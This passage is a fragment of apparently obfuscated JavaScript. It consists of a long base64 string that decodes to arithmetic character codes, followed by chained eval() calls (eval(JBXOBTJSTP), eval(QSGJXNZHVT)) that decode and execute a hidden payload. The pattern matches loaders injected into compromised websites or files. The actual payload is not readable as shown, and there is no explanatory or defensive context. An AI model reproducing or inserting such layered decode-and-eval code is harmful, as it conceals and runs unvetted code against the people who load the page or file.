NCwgNzggLSAzLCAxMDcgLSAxLCA5MSAtIDYsIDc0IC0gOCwgODAgLSA3LCA5NSAtIDgsIDgzIC0gNSwgMTEyIC0gNywgODYgLSA1LCAxMDQgLSAxLCA2NyAtIDYsIDYyIC0gMSwgNDcgLSA4LCA2NiAtIDcsIDEyIC0gMiwgMTExIC0gOSwgMTIzIC0gNiwgMTE1IC0gNSwgMTAwIC0gMSwgMTE4IC0gMiwgMTA4IC0gMywgMTE4IC0gNywgMTE3IC0gNywgNDAgLSA4LCAxMjkgLSA5LCAxMTkgLSA4LCAxMjIgLSA4LCA5OCAtIDMsIDEwNyAtIDYsIDExMyAtIDMsIDEwNiAtIDcsIDQ3IC0gNywgMTIyIC0gNywgMTE4IC0gMiwgMTIyIC0gOCwgMTEyIC0gNywgMTEzIC0gMywgMTA3IC0gNCwgNTMgLSA5LCAzMyAtIDEsIDExNCAtIDcsIDEwOCAtIDcsIDEyNyAtIDYsIDQ0IC0gMywgMzYgLSA0LCAxMzIgLSA5LCAxNCAtIDQsIDQwIC0gOCwgMzcgLSA1LCAxMjYgLSA4LCAxMDYgLSA5LCAxMTcgLSAzLCAzMyAtIDEsIDExNSAtIDEsIDEwMiAtIDEsIDExOCAtIDMsIDQxIC0gOSwgNjkgLSA4LCAzOSAtIDcsIDQ3IC0gOCwgNDMgLSA0LCA2MCAtIDEsIDE0IC0gNCwgMzYgLSA0LCAzMyAtIDEsIDEwNSAtIDMsIDEyMCAtIDksIDExNiAtIDIsIDM1IC0gMywgNDcgLSA3LCAxMjYgLSA4LCAxMDEgLSA0LCAxMjAgLSA2LCA0MCAtIDgsIDEwOCAtIDMsIDM3IC0gNSwgNjIgLSAxLCA0MCAtIDgsIDU2IC0gOCwgNjMgLSA0LCAzMyAtIDEsIDExNCAtIDksIDQwIC0gOCwgNjkgLSA5LCAzOCAtIDYsIDEyMyAtIDgsIDEyNSAtIDksIDEyMiAtIDgsIDEwNiAtIDEsIDExMiAtIDIsIDEwNyAtIDQsIDUyIC0gNiwgMTEzIC0gNSwgMTA5IC0gOCwgMTE5IC0gOSwgMTA5IC0gNiwgMTI0IC0gOCwgMTEzIC0gOSwgNjYgLSA3LCAzOCAtIDYsIDEwNiAtIDEsIDQ2IC0gMywgNDUgLSAyLCA0MiAtIDEsIDQxIC0gOSwgMTI3IC0gNCwgMTkgLSA5LCA0MSAtIDksIDM1IC0gMywgMzMgLSAxLCAzOCAtIDYsIDEyMCAtIDYsIDEwMyAtIDIsIDEyMyAtIDgsIDM4IC0gNiwgNDcgLSA0LCA2NCAtIDMsIDM4IC0gNiwgOTEgLSA4LCAxMjAgLSA0LCAxMTUgLSAxLCAxMDkgLSA0LCAxMTQgLSA0LCAxMDUgLSAyLCA1MSAtIDUsIDEwOCAtIDYsIDEyMCAtIDYsIDEyMCAtIDksIDExMyAtIDQsIDY5IC0gMiwgMTA4IC0gNCwgOTggLSAxLCAxMjIgLSA4LCA3MCAtIDMsIDExMiAtIDEsIDEwNSAtIDUsIDEwNiAtIDUsIDQ2IC0gNiwgMTIzIC0gOCwgMTIyIC0gNiwgMTE3IC0gMywgMTA3IC0gMiwgMTE5IC0gOSwgMTA2IC0gMywgNTMgLSA3LCAxMDAgLSAxLCAxMDkgLSA1LCA5OCAtIDEsIDEyMCAtIDYsIDY5IC0gMiwgMTEyIC0gMSwgMTA0IC0gNCwgMTA3IC0gNiwgNjkgLSA0LCAxMTcgLSAxLCA0OCAtIDgsIDExNCAtIDksIDQ4IC0gNywgNDAgLSA4LCA5NSAtIDEsIDE4IC0gOCwgMTQgLSA1LCAxMiAtIDMsIDE0IC0gNSwgMTAgLSAxLCAxMTMgLSA2LCAxMDggLSA3LCAxMzAgLSA5LCA1MSAtIDUsIDEwNiAtIDcsIDExMyAtIDksIDEwNiAtIDksIDExOSAtIDUsIDc0IC0gNywgMTEyIC0gMSwgMTAxIC0gMSwgMTA2IC0gNSwgNzEgLSA2LCAxMjMgLSA3LCA0MiAtIDIsIDEwNyAtIDIsIDM1IC0gMywgNDYgLSA5LCAzNCAtIDIsIDExMCAtIDMsIDEwMyAtIDIsIDEyNyAtIDYsIDQ5IC0gMywgMTE3IC0gOSwgMTA0IC0gMywgMTE0IC0gNCwgMTA5IC0gNiwgMTIzIC0gNywgMTEwIC0gNiwgNDMgLSAyLCA0OCAtIDcsIDY2IC0gNywgMTQgLSA0LCAzNSAtIDMsIDM1IC0gMywgMTMxIC0gNiwgMTggLSA4LCA0MCAtIDgsIDMzIC0gMSwgMTE3IC0gMywgMTA5IC0gOCwgMTE3IC0gMSwgMTI2IC0gOSwgMTIxIC0gNywgMTE3IC0gNywgMzcgLSA1LCAxMjAgLSA2LCAxMDYgLSA1LCAxMTggLSAzLCA2MSAtIDIsIDE2IC0gNiwgMTMwIC0gNSwgMTQgLSA0LCAxOCAtIDgsIDEyMiAtIDQsIDEwNCAtIDcsIDExNyAtIDMsIDM4IC0gNiwgMTA3IC0gNywgMTAyIC0gMSwgMTAwIC0gMSwgMzcgLSA1LCA2NyAtIDYsIDM4IC0gNiwgMTIyIC0gMiwgMTE5IC0gOCwgMTIwIC0gNiwgOTYgLSAxLCAxMDQgLSAzLCAxMTYgLSA2LCAxMDQgLSA1LCA0NCAtIDQsIDk4IC0gMSwgMTIzIC0gNywgMTE5IC0gOCwgMTAxIC0gMywgNDMgLSAzLCAxMDQgLSAzLCAxMTIgLSAyLCAxMDMgLSA0LCAxMDYgLSA1LCAxMDcgLSA3LCA0OCAtIDcsIDUwIC0gNiwgMzUgLSAzLCAxMDggLSAxLCAxMDcgLSA2LCAxMjkgLSA4LCA1MCAtIDksIDY4IC0gOSwgMTMgLSAzLCA0NyAtIDcsIDExMiAtIDIsIDEwMyAtIDIsIDEyNCAtIDUsIDM4IC0gNiwgNzYgLSA2LCAxMjEgLSA0LCAxMTQgLSA0LCAxMDEgLSAyLCAxMTggLSAyLCAxMTQgLSA5LCAxMTIgLSAxLCAxMTYgLSA2LCA0OSAtIDksIDEwMSAtIDEsIDEwNCAtIDMsIDEwNiAtIDcsIDQ5IC0gOCwgNDggLSA3LCA0MiAtIDIsIDQ4IC0gNywgNjUgLSA2LCAxOSAtIDksIDE4IC0gOCk7ZXZhbChKQlhPQlRKU1RQKTs=’);
eval(QSGJXNZHVT);